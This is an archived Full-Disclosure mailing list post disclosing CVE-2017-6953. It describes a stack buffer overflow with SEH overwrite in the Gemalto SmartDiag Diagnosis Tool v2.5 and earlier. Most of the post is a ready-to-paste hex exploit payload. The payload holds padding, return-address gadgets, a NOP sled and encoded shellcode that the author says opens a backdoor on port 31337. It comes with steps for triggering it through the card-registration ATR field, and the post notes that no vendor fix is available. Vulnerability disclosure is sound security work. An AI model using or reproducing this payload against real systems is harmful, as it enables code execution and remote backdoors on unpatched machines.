lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAPRan0+cecjKXAPdGHrPyKLrp7u6LJyWz7MrKr7v+PcX5PqBtA@mail.gmail.com>
Date: Tue, 9 May 2017 22:48:39 +0300
From: Majid Alqabandi <majid@...host.com>
To: fulldisclosure@...lists.org
Subject: [FD] Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow -
 SEH Overwrite - Code Execution

# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow
- SEH Overwrite - Code Execution
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
# Vendor Notified: 17-04-2016


1. Description
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
When trying to (Register a new card), Input fields are vulnerable to stack
overflow attack which leads to code execution and other possible security
threats.



2. Proof of Concept

The following PoC is provided code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.

To exploit, start SmartDiag.exe tool, choose "Register a new card", on the
ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag
v2.5):

52834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340
 0052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528
 3400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000
 5283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000572b0410477f40008c214100f494400041ed40003b4140003552011078ab0110010000009cf2021000100000328b031040000000d02203100120400026e6400090909090e2f5001090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc3158140358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec47604506d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e8667694e0b79ad69f30cc5898e161
 ef3549283531f046065ccd3e369b990ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf5530d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bdc7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c538f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



3. Solution:
Vendor has been informed and confirmed the issue, no fix is available yet
from vendor.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ